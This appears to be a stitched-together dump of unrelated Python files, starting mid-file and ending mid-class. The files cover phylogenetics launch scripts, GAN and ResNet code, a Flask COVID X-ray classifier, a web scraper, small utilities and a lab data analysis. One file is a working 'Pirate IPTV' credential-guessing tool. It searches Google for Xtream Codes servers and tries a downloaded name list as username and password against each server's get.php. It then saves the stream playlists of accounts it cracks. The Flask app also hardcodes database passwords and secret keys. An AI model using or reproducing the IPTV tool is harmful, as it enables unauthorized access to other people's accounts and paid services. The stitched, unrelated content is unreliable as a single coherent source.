print("Unknown search strategy " + strategy)
exit(1)
def has_multiple_sample(starting_tree):
return "ale" in starting_tree.lower() or "multiple" in starting_tree.lower()
def get_starting_tree_path(datadir, subst_model, family, starting_tree):
#if (has_multiple_sample(starting_tree)):
# return os.path.join(fam.get_family_misc_dir(datadir, family), starting_tree + "." + subst_model + "_onesample.geneTree")
#else:
return fam.build_gene_tree_path(datadir, subst_model, family, starting_tree)
# GeneRax does not accept tree files with multiple trees
def sample_one_starting_tree(datadir, subst_model, starting_tree):
for family in fam.get_families_list(datadir):
input_tree = fam.build_gene_tree_path(datadir, subst_model, family, starting_tree)
output_tree = get_starting_tree_path(datadir, subst_model, family, starting_tree)
tree = open(input_tree, "r").readline()
open(output_tree, "w").write(tree)
def build_generax_families_file(datadir, starting_tree, subst_model, output):
if (has_multiple_sample(starting_tree)):
sample_one_starting_tree(datadir, subst_model, starting_tree)
families_dir = os.path.join(datadir, "families")
with open(output, "w") as writer:
writer.write("[FAMILIES]\n")
plop = 0
print("starting gene tree " + starting_tree)
for family in os.listdir(families_dir):
family_path = os.path.join(families_dir, family)
writer.write("- " + family + "\n")
gene_tree = get_starting_tree_path(datadir, subst_model, family, starting_tree)
if (starting_tree == "random"):
gene_tree = "__random__"
writer.write("starting_gene_tree = " + gene_tree + "\n")
writer.write("alignment = " + fam.get_alignment_file(family_path) + "\n")
writer.write("mapping = " + fam.get_mappings(datadir, family) + "\n")
raxml_model = ""
if (starting_tree != "random" and starting_tree != "true"):
raxml_model = fam.get_raxml_best_model(datadir, subst_model, family)
if (os.path.isfile(raxml_model)):
writer.write("subst_model = " + raxml_model + "\n")
else:
writer.write("subst_model = " + sequence_model.get_raxml_model(subst_model) + "\n")
def get_generax_command(generax_families_file, species_tree, strategy, additional_arguments, output_dir, mode, cores):
executable = exp.generax_exec
old = exp.checkAndDelete("--old", additional_arguments)
if (mode == "gprof"):
executable = exp.generax_gprof_exec
elif (mode == "scalasca"):
executable = exp.generax_scalasca_exec
if (old):
executable += "old"
generax_output = os.path.join(output_dir, "generax")
command = []
command.append("mpirun")
command.append("-np")
command.append(str(cores))
command.append(executable)
command.append("-f")
command.append(generax_families_file)
command.append("-s")
command.append(species_tree)
command.append("--strategy")
command.append(strategy)
command.append("-p")
command.append(generax_output)
command.extend(additional_arguments)
return " ".join(command)
def run_generax(datadir, subst_model, strategy, species_tree, generax_families_file, mode, cores, additional_arguments, resultsdir):
species_tree = fam.get_species_tree(datadir, subst_model, species_tree)
command = get_generax_command(generax_families_file, species_tree, strategy, additional_arguments, resultsdir, mode, cores)
print(command)
subprocess.check_call(command.split(" "), stdout = sys.stdout)
def get_mode_from_additional_arguments(additional_arguments):
mode = "normal"
if ("--scalasca" in additional_arguments):
mode = "scalasca"
additional_arguments.remove("--scalasca")
elif ("--gprof" in additional_arguments):
mode = "gprof"
additional_arguments.remove("--gprof")
return mode
def extract_trees(datadir, results_family_dir, run_name, subst_model):
results_dir = os.path.join(results_family_dir, "reconciliations")
for family in fam.get_families_list(datadir):
#source = os.path.join(results_dir, family, "geneTree.newick")
source = os.path.join(results_dir, family + "_events.newick")
dest = fam.build_gene_tree_path_from_run(datadir, family, run_name)
try:
shutil.copy(source, dest)
except:
pass
def get_run_name(species_tree, gene_trees, subst_model, strategy, additional_arguments):
rec_model = exp.getArg("--rec-model", additional_arguments, "UndatedDTL")
radius = exp.getArg("--max-spr-radius", additional_arguments, "5")
mad = "--mad-rooting" in additional_arguments
per_fam_rates = "--per-family-rates" in additional_arguments
per_species_rates = "--per-species-rates" in additional_arguments
run_name = "generax-" + strategy + "-" + rec_model + "-r" + radius
if (mad):
run_name += "-mad"
if (per_fam_rates):
run_name += "-famrates"
if (per_species_rates):
run_name += "-speciesrates"
tc = exp.getArg("--transfer-constraint", additional_arguments, "NONE")
if (tc == "PARENTS"):
run_name += "-tcparent"
if (tc == "SOFTDATED"):
run_name += "-tcsoft"
seed = exp.getArg("--seed", additional_arguments, None)
if (seed != None):
run_name += "-seed" + str(seed)
run_name += "." + subst_model
return run_name
def extract_events(datadir, results_family_dir, additional_arguments):
#try:
rec_model = exp.getArg("--rec-model", additional_arguments, "UndatedDTL")
radius = int(exp.getArg("--max-spr-radius", additional_arguments, "5"))
event_counts = extract_event_number.extract(results_family_dir)
events.update_event_counts(datadir, rec_model, radius, event_counts)
def run(datadir, subst_model, strategy, species_tree, starting_tree, cores, additional_arguments, resultsdir, do_analyze = True, do_extract = True):
run_name = exp.getAndDelete("--run", additional_arguments, None)
if (None == run_name):
run_name = get_run_name(species_tree, starting_tree, subst_model, strategy, additional_arguments)
arg_analyze = exp.getAndDelete("--analyze", additional_arguments, "yes")
#do_analyze = do_analyze and (arg_analyze == "yes") and (strategy != "EVAL")
print("Run name " + run_name)
sys.stdout.flush()
mode = get_mode_from_additional_arguments(additional_arguments)
generax_families_file = os.path.join(resultsdir, "families.txt")
build_generax_families_file(datadir, starting_tree, subst_model, generax_families_file)
start = time.time()
run_generax(datadir, subst_model, strategy, species_tree, generax_families_file, mode, cores, additional_arguments, resultsdir)
saved_metrics.save_metrics(datadir, run_name, (time.time() - start), "runtimes")
saved_metrics.save_metrics(datadir, run_name, (time.time() - start), "seqtimes")
radius = int(exp.getArg("--max-spr-radius", additional_arguments, "5"))
#if (radius == 0):
# print("Warning, not extracting trees when --max-spr-radius 0 is set")
# do_extract = False
# do_analyze = False
if (do_extract):
extract_trees(datadir, os.path.join(resultsdir, "generax"), run_name, subst_model)
try:
if (do_analyze):
fast_rf_cells.analyze(datadir, "all", cores, run_name)
#rf_cells.analyze(datadir, "all", True)
except:
print("Analyze failed!!!!")
extract_events(datadir, os.path.join(resultsdir, "generax"), additional_arguments)
print("Output in " + resultsdir)
return resultsdir
def launch(datadir, subst_model, strategy, species_tree, starting_tree, cluster, cores, additional_arguments):
command = ["python3"]
command.extend(sys.argv)
command.append("--exprun")
dataset = os.path.basename(datadir)
resultsdir = os.path.join("GeneRax", dataset, strategy + "_" + species_tree + "_start_" + starting_tree, "run")
resultsdir = exp.create_result_dir(resultsdir, additional_arguments)
submit_path = os.path.join(resultsdir, "submit.sh")
command.append(resultsdir)
print(" ".join(command))
exp.submit(submit_path, " ".join(command), cores, cluster)
if (__name__ == "__main__"):
print("launch_generax " + str(sys.argv))
is_run = ("--exprun" in sys.argv)
resultsdir = ""
if (is_run):
resultsdir = sys.argv[-1]
sys.argv = sys.argv[:-2]
min_args_number = 8
if (len(sys.argv) < min_args_number):
print("Syntax error: python " + os.path.basename(__file__) + " dataset species_tree gene_trees subst_model strategy cluster cores [additional paremeters].\n ")
sys.exit(1)
datadir = os.path.normpath(sys.argv[1])
species_tree = sys.argv[2]
starting_tree = sys.argv[3]
subst_model = sys.argv[4]
strategy = sys.argv[5]
cluster = sys.argv[6]
cores = int(sys.argv[7])
additional_arguments = sys.argv[min_args_number:]
check_inputs(strategy)
if (starting_tree == "raxml"):
print("use raxml-ng instead of raxml please")
exit(1)
if (is_run):
run(datadir, subst_model, strategy, species_tree, starting_tree, cores, additional_arguments, resultsdir)
else:
launch(datadir, subst_model, strategy, species_tree, starting_tree, cluster, cores, additional_arguments)
|
import chainer
import numpy as np
import chainer.functions as F
import chainer.links as L
from chainer import optimizers
from chainer import Variable
from chainer import serializers
import PIL.Image as Image
import matplotlib.pyplot as plt
def trainer(G,D,data,len_z=100,n_epoch=10000,pre_epoch=0,batchsize=500,save_interval=1000,
output_dir=None,G_path=None,D_path=None,show=True):
opt_g = optimizers.Adam(alpha=0.0002, beta1=0.5)
opt_d = optimizers.Adam(alpha=0.0002, beta1=0.5)
opt_g.setup(G)
opt_d.setup(D)
opt_g.add_hook(chainer.optimizer.WeightDecay(0.00001))
opt_d.add_hook(chainer.optimizer.WeightDecay(0.00001))
if D_path != None:
serializers.load_hdf5("%s"%(D_path), D)
if G_path != None:
serializers.load_hdf5("%s"%(G_path), G)
n_epoch += pre_epoch
loss_d_mem =np.zeros(n_epoch-pre_epoch)
loss_g_mem =np.zeros(n_epoch-pre_epoch)
for epoch in xrange(pre_epoch,n_epoch):
if epoch%10==0: print 'epoch',epoch
perm = np.arange(len(data))
np.random.shuffle(perm)
for i in xrange(0,len(data),batchsize):
z = Variable(np.random.uniform(-1,1,(batchsize, len_z)).astype(np.float32))
y1 = G(z)
y2 = D(y1)
# discriminator
loss_d = F.sigmoid_cross_entropy(y2,Variable(np.zeros((batchsize,1),dtype=np.int32)))
loss_g = F.sigmoid_cross_entropy(y2,Variable(np.ones((batchsize,1),dtype=np.int32)))
# get images
images = data[perm[i:i+batchsize]]
y2 = D(Variable(images))
loss_d += F.sigmoid_cross_entropy(y2,Variable(np.ones((images.shape[0],1),dtype=np.int32)))
loss_d_mem[epoch-n_epoch] += loss_d.data
loss_g_mem[epoch-n_epoch] += loss_g.data
opt_g.zero_grads()
loss_g.backward()
opt_g.update()
opt_d.zero_grads()
loss_d.backward()
opt_d.update()
#save model
if (epoch+1)%save_interval == 0:
z = Variable(np.random.uniform(-1,1,(10, len_z)).astype(np.float32))
confirm = G(z,False)
if output_dir != None:
serializers.save_hdf5("%s/gan_model_dis%d.h5"%(output_dir,epoch+1), D)
serializers.save_hdf5("%s/gan_model_gen%d.h5"%(output_dir,epoch+1), G)
serializers.save_hdf5("%s/current_gen.h5"%(output_dir), G)
if show:
if D.imshape[0] == 3:
plt.imshow(np.swapaxes(np.swapaxes(confirm.data[0], 0, 2),0,1))
else:
plt.imshow(confirm.data[0].reshape(D.imshape[1],D.imshape[2]),cmap="gray")
plt.axis('off')
plt.savefig('%s/image%d.jpg'%(output_dir,epoch+1))
print '--%d--'%(epoch+1)
print 'p_g :',D(confirm,False).data[0]
print 'p_delta:', D(Variable(images),False).data[0]
print 'done'
return loss_g_mem,loss_d_mem
|
# coding with UTF-8
# ******************************************
# *****CIFAR-10 with ResNet8 in Pytorch*****
# *****deconv_network.py *****
# *****Author:Shiyi Liu *****
# *****Time: Oct 22nd, 2019 *****
# ******************************************
import torch
import torch.nn as nn
class OurConvTranspose2d(nn.ConvTranspose2d):
def __init__(self, in_channels, out_channels, weight, kernel_size=3, stride=1, padding=1, output_padding=0, bias=False):
super().__init__(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride,
padding=padding, output_padding=output_padding, bias=bias)
self.weight.data = weight
class Deconv1(nn.Module):
def __init__(self, inplanes, outplanes, conv_weight, padding=1, stride=1, groups=1, dilation=1):
super().__init__()
# self.weight = conv_weight
self.relu = nn.ReLU(inplace=True)
self.deconv1 = OurConvTranspose2d(in_channels=inplanes, out_channels=outplanes, weight=conv_weight,
kernel_size=3, stride=stride, padding=padding, output_padding=0)
# self.deconv1.weight.data = conv_weight
def forward(self, x):
out = self.relu(x)
out = self.deconv1(out)
return out
class Deconv_BasicBlock(nn.Module):
def __init__(self, inplanes, outplanes, deconv_weights, stride=1):
super(Deconv_BasicBlock, self).__init__()
self.deconv2 = OurConvTranspose2d(inplanes, inplanes, deconv_weights[0], kernel_size=3, stride=1, padding=1, bias=False)
self.relu = nn.ReLU(inplace=True)
self.deconv1 = OurConvTranspose2d(inplanes, outplanes, deconv_weights[1], kernel_size=3, stride=stride, padding=1, output_padding=stride-1, bias=False)
self.shortcut = nn.Sequential()
if inplanes != outplanes or stride != 1:
self.shortcut = nn.Sequential(
OurConvTranspose2d(inplanes, outplanes, deconv_weights[2], kernel_size=1, stride=stride, output_padding=stride-1, padding=0, bias=False)
)
def forward(self, x):
x = self.relu(x)
# print('\tbasic input: {}'.format(x.size()))
out = self.relu(self.deconv2(x))
# print('\tafter deconv2: {}'.format(out.size()))
out = self.deconv1(out)
# print('\tafter deconv1: {}'.format(out.size()))
out += self.shortcut(x)
return out
class Deconv_ResNet18(nn.Module):
def __init__(self, deconv_weight, num_classes=10, deconv1=nn.Sequential()):
self.inplanes = 512
super(Deconv_ResNet18, self).__init__()
self.deconv5_x = self._make_layer(256, deconv_weight[15:20], 2)
self.deconv4_x = self._make_layer(128, deconv_weight[10:15], 2)
self.deconv3_x = self._make_layer(64, deconv_weight[5:10], 2)
self.deconv2_x = self._make_layer(64, deconv_weight[1:5], 1)
self.deconv1 = deconv1
def _make_layer(self, planes, basic_weights, stride):
layers = []
block_weight2 = [basic_weights[4], basic_weights[3]] if stride==2 else [basic_weights[3], basic_weights[2]]
layers.append(Deconv_BasicBlock(self.inplanes, self.inplanes, block_weight2, stride=1))
block_weight1 = [basic_weights[1], basic_weights[0], basic_weights[2]] if stride == 2 else [basic_weights[1],
basic_weights[0]]
layers.append(Deconv_BasicBlock(self.inplanes, planes, block_weight1, stride=stride))
self.inplanes = planes
return nn.Sequential(*layers)
def forward(self, x):
# print('resnet input : {}'.format(x.size()))
out = self.deconv5_x(x)
# print('resnet after deconv5: {}'.format(out.size()))
out = self.deconv4_x(out)
# print('resnet after deconv4: {}'.format(out.size()))
out = self.deconv3_x(out)
# print('resnet after deconv3: {}'.format(out.size()))
out = self.deconv2_x(out)
# print('resnet after deconv2: {}'.format(out.size()))
out = self.deconv1(out)
return out
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import urllib2
import google
from urlparse import urlparse
import sys
import os
from sys import argv as s
import time
from tqdm import tqdm
from termcolor import colored
import platform
from os.path import expanduser
import wget
if platform.release() == 7:
import ctypes
from ctypes import wintypes
lpBuffer = wintypes.LPWSTR()
AppUserModelID = ctypes.windll.shell32.GetCurrentProcessExplicitAppUserModelID
AppUserModelID(ctypes.cast(ctypes.byref(lpBuffer), wintypes.LPWSTR))
appid = lpBuffer.value
ctypes.windll.kernel32.LocalFree(lpBuffer)
if appid is not None:
print(appid)
myappid = 'IPTV' # arbitrary string
ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)
# for icon in task bar windows 7
if os.name == 'posix':
separatore = "/"
else:
separatore = """\\"""
if os.name == 'posix':
dir_iptv = expanduser("~") + separatore + "IPTV"
else:
dir_iptv = separatore + "IPTV"
if os.path.exists(dir_iptv):
os.chdir(dir_iptv)
else:
os.mkdir(dir_iptv)
os.chdir(dir_iptv)
download_list = 'https://raw.githubusercontent.com/Pinperepette/IPTV/master/iptv/names/it.txt'
download = wget.download(download_list)
download
os.mkdir("output")
class IPTV(object):
def __init__(self, stdout=None, stderr=None):
self._stdout = stdout or sys.stdout
self._stderr = stderr or sys.stderr
self.lista = 'it.txt'
self.query = 'Xtream Codes v1.0.59.5'
self.directory = "output"
self.msg = "Pirate IPTV"
self.parsedUrls = ['']
def __enter__(self):
self.old_stdout, self.old_stderr = sys.stdout, sys.stderr
self.old_stdout.flush(); self.old_stderr.flush()
sys.stdout, sys.stderr = self._stdout, self._stderr
def __exit__(self, exc_type, exc_value, traceback):
self._stdout.flush(); self._stderr.flush()
sys.stdout = self.old_stdout
sys.stderr = self.old_stderr
def print_link(self):
with IPTV(stdout=devnull, stderr=devnull):
for url in google.search(self.query, num=60, stop=1):
parsed = urlparse(url)
self.parsedUrls.append(parsed.scheme + '://' + parsed.netloc +"\n")
time.sleep(1)
print '\n'.join(self.parsedUrls)
def search_account(self,URL, b=1, bsize=1):
segale_rosso = colored ('[*]','red')
segale_verde = colored ('[*]','green')
print (segale_rosso + ' [CTRL + c] = [IPTV Attack Interrupted]')
t= tqdm()
last_b = [0]
righe = open( self.lista ,'r')
tsize = len(righe.readlines())
TT = (str(tsize))
t.total = tsize
tr = 0
with open(self.lista) as f:
content = f.readlines()
for r in content:
req = urllib2.Request( URL + '/get.php?username=%s&password=%s&type=m3u&output=mpegts'%(r.rstrip().lstrip(),r.rstrip().lstrip()))
response = urllib2.urlopen(req)
the_page = response.read()
tsize = (tsize - 1)
t.update((b - last_b[0]) * bsize)
last_b[0] = b
TM = (str(tsize))
time.sleep(0.2)
if len(the_page) > 0:
tr = (tr + 1)
msg = (segale_verde + " Account found: ")
print (msg + str(tr))
new_path = self.directory + "/" + URL.replace("http://", "")
if os.path.exists(new_path) is False:
os.makedirs(new_path)
out_file = open(str(new_path) + "/tv_channels_%s.m3u" % r.rstrip().lstrip(), "w")
out_file.write(the_page)
out_file.close()
def usage(self):
print ('##### USAGE #####')
print ("for print list server " + s[0] + " " + "-pl")
print ("for search account " + s[0] + " " + "http://site.server")
if __name__ == "__main__":
try:
app = IPTV()
devnull = open(os.devnull, 'w')
if len(s) == 1:
app.usage()
exit()
if s[1] == '-h':
app.usage()
exit()
if s[1] == '-pl':
app.print_link()
exit()
app.search_account(s[1])
except KeyboardInterrupt:
segale_giallo = colored ('[*]','yellow')
print ("\r" + segale_giallo + ' IPTV Attack Interrupted')
sys.exit(0)
|
from flask import Flask, flash, request, redirect, url_for, render_template
import urllib.request
import os
from werkzeug.utils import secure_filename
import pickle
from keras.applications.imagenet_utils import preprocess_input, decode_predictions
from keras.models import load_model
from keras.preprocessing import image
from flask import Flask, redirect, url_for, request, render_template
from werkzeug.utils import secure_filename
from gevent.pywsgi import WSGIServer
from PIL import Image
import psycopg2 #pip install psycopg2
import psycopg2.extras
import torchvision
import torch
import numpy as np
MODEL_PATH = 'models/covid_classifier.h5'
resnet18 = torchvision.models.resnet18(pretrained=True)
resnet18.fc = torch.nn.Linear(in_features=512, out_features=3)
resnet18.load_state_dict(torch.load(MODEL_PATH))
resnet18.eval()
class_names = ['normal', 'viral', 'covid']
#resnet18 = torchvision.models.resnet18(pretrained=True)
train_transform = torchvision.transforms.Compose([
torchvision.transforms.Resize(size=(224, 224)),
torchvision.transforms.RandomHorizontalFlip(),
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
test_transform = torchvision.transforms.Compose([
torchvision.transforms.Resize(size=(224, 224)),
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])
def predict_image_class(image_path):
image = Image.open(image_path).convert('RGB')
image = test_transform(image)
# Please note that the transform is defined already in a previous code cell
image = image.unsqueeze(0)
output = resnet18(image)[0]
probabilities = torch.nn.Softmax(dim=0)(output)
probabilities = probabilities.cpu().detach().numpy()
predicted_class_index = np.argmax(probabilities)
predicted_class_name = class_names[predicted_class_index]
return probabilities, predicted_class_index, predicted_class_name
print('Model loaded. Check http://127.0.0.1:5000/')
app = Flask(__name__)
app.secret_key = "cairocoders-ednalan"
DB_HOST = "localhost"
DB_NAME = "CC_photo"
DB_USER = "bob"
DB_PASS = "admin"
conn = psycopg2.connect(dbname=DB_NAME, user=DB_USER, password=DB_PASS, host=DB_HOST)
UPLOAD_FOLDER = 'static/uploads/'
app.secret_key = "secret key"
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
app.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024
ALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'gif'])
def allowed_file(filename):
return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route('/')
def home():
return render_template('index.html')
@app.route('/', methods=['POST'])
def upload_image():
cursor = conn.cursor(cursor_factory=psycopg2.extras.DictCursor)
if 'file' not in request.files:
flash('No file part')
return redirect(request.url)
file = request.files['file']
if file.filename == '':
flash('No image selected for uploading')
return redirect(request.url)
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
#print('upload_image filename: ' + filename)
probabilities, predicted_class_index, predicted_class_name = predict_image_class(file)
#print('Probabilities:', probabilities)
#print('Predicted class index:', predicted_class_index)
#print('Predicted class name:', predicted_class_name)
#probabilities.values.astype(int)
#predicted_class = predicted_class_name.tolist()
prob = float(np.mean(probabilities))
name=request.form["name"]
age=request.form["age"]
city=request.form["city"]
state=request.form["state"]
pincode=request.form["pincode"]
mobile=request.form["mobile"]
gender=request.form["gender"]
bloodgroup=request.form["bloodgroup"]
cursor.execute("INSERT INTO db_cc_photo (img , name , age, city, state, pincode, mobile, gender, bloodgroup ,predicted_class_name, probabilities) VALUES (%s ,%s ,%s ,%s ,%s ,%s ,%s ,%s ,%s ,%s ,%s)", (filename, name , age, city, state, pincode, mobile, gender, bloodgroup, predicted_class_name, prob) )
conn.commit()
#file_path = file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
# Make prediction
#display(image_path)
return render_template('index.html', prediction_text='Covid-19 Detection Result is : {}'.format(predicted_class_name , prob), prob_text='And Probability is : {}'.format( prob) , filename=filename)
#flash('Image successfully uploaded and displayed below')
#return render_template('index.html', filename=filename)
else:
flash('Allowed image types are - png, jpg, jpeg, gif')
return redirect(request.url)
@app.route('/display/<filename>')
def display_image(filename):
print('display_image filename: ' + filename)
return redirect(url_for('static', filename='uploads/' + filename), code=301)
if __name__ == "__main__":
app.debug = True
app.run()
|
import scrapy
from registrarData.items import RegistrardataItem
class ComSciSpider(scrapy.Spider):
name = "ComSciClasses"
allowed_domains = ["registrar.ucla.edu"]
start_urls = [
"http://www.registrar.ucla.edu/schedule/crsredir.aspx?termsel=14F&subareasel=COM+SCI"
]
def parse(self, response):
filename = response.url.split("/")[-2]
with open(filename, 'wb') as f:
for sel in response.xpath('//option'):
id = sel.xpath('@value').extract()[0]
id = id.replace(' ', '+')
next_url = "http://www.registrar.ucla.edu/schedule/detselect.aspx?termsel=14F&subareasel=COM+SCI&idxcrs=" + id
request = scrapy.Request(url=next_url,
callback=self.parse_detselect)
item = RegistrardataItem()
request.meta['item'] = item
yield request
def parse_detselect(self, response):
"""
Parses page with lecture/discussion section info
"""
next_url = response.xpath('//span[@id=\'{}\']/span/a/@href'.format(
'ctl00_BodyContentPlaceHolder_detselect_ctl02_ctl02_lblIDNumber'
)).extract()[0]
next_url = 'http://www.registrar.ucla.edu/schedule/' + next_url
request = scrapy.Request(url=next_url,
callback=self.parse_subdet)
request.meta['item'] = response.meta['item']
yield request
def parse_subdet(self, response):
"""
Parses page with section/course info
"""
item = response.meta['item']
label = 'ctl00_BodyContentPlaceHolder_subdet_lbl'
span_text = 'span[@id=\'{}\']/text()'
main_div = response.xpath('//div[@id=\'{}\']'.format(
'ctl00_BodyContentPlaceHolder_subdet_pnlBodyContent'
))
item['course_name'] = main_div.xpath('p/' + span_text.format(
label + 'CourseHeader'
)).extract()[0]
section_info = main_div.xpath('div[@id=\'{}\']/p'.format(
'ctl00_BodyContentPlaceHolder_subdet_pnlSectionInfo'
))
item['lec_num'] = section_info.xpath(span_text.format(
label + 'Section'
)).extract()[0]
item['lec_prof'] = section_info.xpath(span_text.format(
label + 'Instructor'
)).extract()[0]
item['lec_final'] = section_info.xpath(span_text.format(
label + 'FinalExam'
)).extract()[0]
course_info = main_div.xpath('div[@class=\'{}\']/p'.format(
'tblCourseBody_detselect'
))
item['course_desc'] = course_info.xpath(span_text.format(
label + 'CourseDescription'
)).extract()[0]
item['course_ge'] = course_info.xpath(span_text.format(
label + 'GEStatus'
)).extract()[0]
item['course_units'] = course_info.xpath(span_text.format(
label + 'Units'
)).extract()[0]
item['course_grading'] = course_info.xpath(span_text.format(
label + 'GradingDetail'
)).extract()[0]
item['course_reqs'] = course_info.xpath(span_text.format(
label + 'EnforcedReq'
)).extract()[0]
item['course_impacted'] = course_info.xpath(span_text.format(
label + 'Impacted'
)).extract()[0]
item['course_restrict']= course_info.xpath(span_text.format(
label + 'EnrollRestrict'
)).extract()[0]
item['course_consent']= course_info.xpath(span_text.format(
label + 'ConsentReq'
)).extract()[0]
item['course_fee'] = course_info.xpath(span_text.format(
label + 'MaterialFee'
)).extract()[0]
item['course_notes'] = course_info.xpath(span_text.format(
label + 'Notes'
)).extract()[0]
return item
|
#!/usr/bin/env python2
# Imports for connecting to SQLite DB
from sqlalchemy import create_engine, exc
from sqlalchemy.orm import sessionmaker
from database_setup import Base, Category, Item, User
# Connect to DB
DBNAME = "sqlite:///itemcatalogwithusers.db"
engine = create_engine(DBNAME)
Base.metadata.bind = engine
# Create DB session instance
DBSession = sessionmaker(bind=engine)
session = DBSession()
# Create list of categories
CATEGORIES = [
"Soccer",
"Basketball",
"Baseball",
"Frisbee",
"Snowboarding",
"Rock Climbing",
"Foosball",
"Skating",
"Hockey"
]
# List of items
ITEMS = [
Item(
category_id=1,
title="Soccer Cleats",
description="The shoes",
user_id=1),
Item(category_id=1, title="Jersey", description="The shirt", user_id=1),
Item(category_id=2, title="Jersey", description="The shirt", user_id=1),
Item(category_id=3, title="Bat", description="The bat", user_id=1),
Item(category_id=5, title="Snowboard", description="The board", user_id=1)
]
# List of users
USERS = [
User(name="John Doe", email="johndoe@example.com")
]
# Add Categories to DB
def add_categories(categories):
for category in categories:
new_category = Category(title=category)
try:
session.add(new_category)
session.commit()
except exc.IntegrityError:
session.rollback()
# Add Items to DB
def add_items(items):
for item in items:
try:
session.add(item)
session.commit()
except exc.IntegrityError:
session.rollback()
# Add Users to DB
def add_users(users):
for user in users:
try:
session.add(user)
session.commit()
except exc.IntegrityError:
session.rollback()
add_categories(CATEGORIES)
add_items(ITEMS)
add_users(USERS)
|
import telegram
import os
def send_telegram(message=None,image=None):
chat_id=os.getenv('TELEGRAM_CHANNEL_ID')
bot = telegram.Bot(token=os.getenv('TELEGRAM_TOKEN'))
if image and message:
bot.send_message(chat_id=chat_id, text=message)
with open(image, 'rb') as img:
bot.send_photo(chat_id=chat_id, photo=img)
elif image:
with open(image, 'rb') as img:
bot.send_photo(chat_id=chat_id, photo=img)
elif message:
bot.send_message(chat_id=chat_id, text=message)
else:
print('No data found.')
if __name__ == "__main__":
send_telegram(None,None)
|
# -*- coding: utf-8 -*-
"""
Created on Thu Jan 31 18:56:59 2019
@author: Raghav
"""
import numpy as np
import cv2
from sklearn.svm import SVC
from sklearn.model_selection import cross_val_score
from sklearn.externals import joblib
import os
dirs = os.listdir('output/')
DIRECTORY = './output/'
def trainingDataFormation():
image_data = []
target_value = []
for dname in dirs:
currentDirectory = DIRECTORY + str(dname) + '/'
files = os.listdir(currentDirectory)
for cfile in files:
image = cv2.imread(currentDirectory+cfile, 0)
ret, letter_inverse_threshold = cv2.threshold(image, 90, 255, cv2.THRESH_BINARY)
flat_letter_inverse_threshold = np.reshape(letter_inverse_threshold, -1)
image_data.append(flat_letter_inverse_threshold)
target_value.append(dname)
return (np.array(image_data), np.array(target_value))
image_data, target_value = trainingDataFormation()
image_data = np.divide(image_data, 255)
svc_classifier = SVC(kernel = 'rbf', random_state=0)
svc_classifier.fit(image_data, target_value)
def crossValidation(model, folds, training_data, training_label):
accuracy = cross_val_score(model, training_data, training_label, cv=int(folds))
return accuracy
accuracy = crossValidation(svc_classifier, 5, image_data, target_value)
saveDir = '../Models/SVC/'
joblib.dump(svc_classifier, saveDir + 'svc2.pkl')
|
__author__ = 'iceke'
|
__version__ = "3.3.1-beta4"
__version_info__ = (3, 3, 1, 'beta4')
|
import matplotlib.pyplot as plt
import numpy as np
import uncertainties.unumpy as unp
import scipy.constants as con
from scipy.optimize import curve_fit
from scipy import stats
from uncertainties import ufloat
################################################################################
print('\n' + '(I) Bestimmung der Wellenlänge')
N, d = np.genfromtxt('data/1.txt', unpack=True)
ü = 5.017 # Hebelübersetzung
d = d * 10**6 # µm
# d = np.mean(d)
# print(d)
# N = np.mean(N)
l = (2*d)/(N * ü) # µm; Bestimmte Wellenlänge
print(l)
l = ufloat(np.mean(l), stats.sem(l))
print('Bestimmte Wellenlaenge des Lasers: ', l, 'nm')
################################################################################
print('\n\n' + '(II) Brechungsindizes')
N2, p = np.genfromtxt('data/2.txt', unpack=True)
################################
p0 = 1.01325 # bar
T0 = 273.15 # K
T = 293.15 # K
b = 50*10**(-3) # m
################################
lr = 635 * 10**(-9) # nm; Wellenlänge des verwendeten Lasers.
# N2 = np.mean(N2)
dn = (N2 * lr) / (2 * b)
# p = np.mean(p)
p = p * (-1)
print('Delta_p = ', p)
nn = 1 + dn * (T / T0) * (p0 / p)
print(nn)
nn = ufloat(np.mean(nn), stats.sem(nn))
print('n = ', nn)
################################ DISKUSSION ####################################
print('\n\n' + '(III) Abweichungen von der Theorie')
lr = 635 # nm
nluft = 1.000292
# http://www.didaktik.physik.uni-duisburg-essen.de/~backhaus/NaturPhysikalisch/Naturphysikalischgesehen2004/OptischePhaenomene/Regenbogen/Brechungsindizes.htm
###################
# l = l * 10**3 # nm
dl = (l - lr) / lr
print('Delta l: ', dl)
nluft = nluft - 1
nn = nn - 1
print(nn)
dnn = (nn - nluft) / nluft
print('Delta nn: ', dnn)
|
#
# (C) Copyright 2012 Enthought, Inc., Austin, TX
# All right reserved.
#
# This file is open source software distributed according to the terms in
# LICENSE.txt
#
from .transition_manager import TransitionManager
_transition_manager = None
def get_transition_manager():
""" Get the global transition manager. """
global _transition_manager
if _transition_manager is None:
_transition_manager = TransitionManager()
return _transition_manager
def set_transition_manager(transition_manager):
""" Set the global transition manager.
Raises
------
ValueError - If an transition manager has already been set. This is to prevent
the loss of registered listeners which may be being used by others.
"""
global _transition_manager
if _transition_manager is not None:
raise ValueError('Event manager has already been set.')
_transition_manager = transition_manager
|
#!/usr/bin/python3
"""Single linked list Module"""
class Node():
"""Sigly linked list Node.
Private instance attribute: data:
property def data(self):
property setter def data(self, value):
Private instance attribute: next_node:
property def next_node(self).
property setter def next_node(self, value).
Instantiation with data and next_node.
"""
def __init__(self, data, next_node=None):
"""Constructor"""
self.data = data
self.next_node = next_node
@property
def data(self):
"""retrieves the data"""
return self.__data
@data.setter
def data(self, value):
"""sets the data"""
if type(value) != int:
raise TypeError("data must be an integer")
self.__data = value
@property
def next_node(self):
"""retrieves the next_node"""
return self.__next_node
@next_node.setter
def next_node(self, value):
"""sets the next_node"""
if not isinstance(value, Node) and value is not None:
raise TypeError("next_node must be a Node object")
self.__next_node = value
class SinglyLinkedList():
"""Sigly linked list.
Private instance attribute: head (no setter or getter).
